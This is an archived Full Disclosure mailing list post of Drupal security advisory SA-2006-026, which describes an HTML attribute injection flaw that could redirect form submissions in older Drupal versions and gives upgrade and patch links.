Home page logo

fulldisclosure logo Full Disclosure mailing list archives

[DRUPAL-SA-2006-026] Drupal 4.6.10 / 4.7.4 fixes HTML attribute injection issue
From: Uwe Hermann <uwe () hermann-uwe de>
Date: Thu, 19 Oct 2006 19:08:06 +0200

Drupal security advisory                                  DRUPAL-SA-2006-026
Project:          Drupal core
Date:             2006-Oct-18
Security risk:    Less critical
Exploitable from: Remote
Vulnerability:    HTML attribute injection

A malicious user may entice users to visit a specially crafted URL that may 
result in the redirection of Drupal form submission to a third-party site. A 
user visiting the user registration page via such a url, for example, will 
submit all data, such as his/her e-mail address, but also possible private 
profile data, to a third-party site.

Versions affected
- Drupal 4.6.x versions before Drupal 4.6.10
- Drupal 4.7.x versions before Drupal 4.7.4

- If you are running Drupal 4.6.x then upgrade to Drupal 4.6.10.
- If you are running Drupal 4.7.x then upgrade to Drupal 4.7.4.

- To patch Drupal 4.6.9 use http://drupal.org/files/sa-2006-026/4.6.9.patch.
- To patch Drupal 4.7.3 use http://drupal.org/files/sa-2006-026/4.7.3.patch.

Please note that the patches only contain changes related to this advisory, 
and do not fix bugs that were solved in 4.6.10 or 4.7.4.

Reported by
Frederic Marand.

The security contact for Drupal can be reached at security at drupal.org or 
using the form at http://drupal.org/contact.

// Uwe Hermann, on behalf of the Drupal Security Team.
Uwe Hermann 
http://www.it-services-uh.de  | http://www.crazy-hacks.org 
http://www.holsham-traders.de | http://www.unmaintained-free-software.org

Attachment: signature.asc
Description: Digital signature

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • [DRUPAL-SA-2006-026] Drupal 4.6.10 / 4.7.4 fixes HTML attribute injection issue Uwe Hermann (Oct 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]